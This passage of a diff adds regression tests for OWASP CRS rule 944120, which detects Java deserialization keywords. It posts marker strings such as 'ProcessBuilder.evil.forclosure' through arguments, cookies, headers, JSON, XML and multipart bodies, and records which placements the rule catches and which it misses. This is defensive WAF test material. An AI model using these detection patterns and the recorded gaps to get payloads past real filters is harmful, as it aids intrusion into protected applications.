"HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-9 + desc: "XML element value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-10 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-11 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.clonetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-12 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.clonetransformer\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-13 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.clonetransformer\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-14 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.clonetransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-15 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.clonetransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-16 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.clonetransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-17 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.clonetransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-18 + desc: "Argument test includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.forclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-19 + desc: "Argument name includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-20 + desc: "Cookie test includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.forclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-21 + desc: "Cookie name includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.forclosure=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-22 + desc: "Request header test includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.forclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-23 + desc: "XML element includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-24 + desc: "XML attribute name includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-25 + desc: "XML attribute value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-26 + desc: "XML element value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-27 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-28 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.forclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-29 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.forclosure\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-30 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.forclosure\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-31 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.forclosure": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-32 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.forclosure": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-33 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.forclosure + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-34 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.forclosure + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-35 + desc: "Argument test includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-36 + desc: "Argument name includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatefactory=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-37 + desc: "Cookie test includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.instantiatefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-38 + desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.instantiatefactory=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-39 + desc: "Request header test includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.instantiatefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-40 + desc: "XML element includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-41 + desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-42 + desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-43 + desc: "XML element value includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-44 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-45 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-46 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.instantiatefactory\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-47 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.instantiatefactory\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-48 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.instantiatefactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-49 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.instantiatefactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-50 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.instantiatefactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-51 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.instantiatefactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-52 + desc: "Argument test includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-53 + desc: "Argument name includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatetransformer=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-54 + desc: "Cookie test includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.instantiatetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-55 + desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.instantiatetransformer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-56 + desc: "Request header test includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 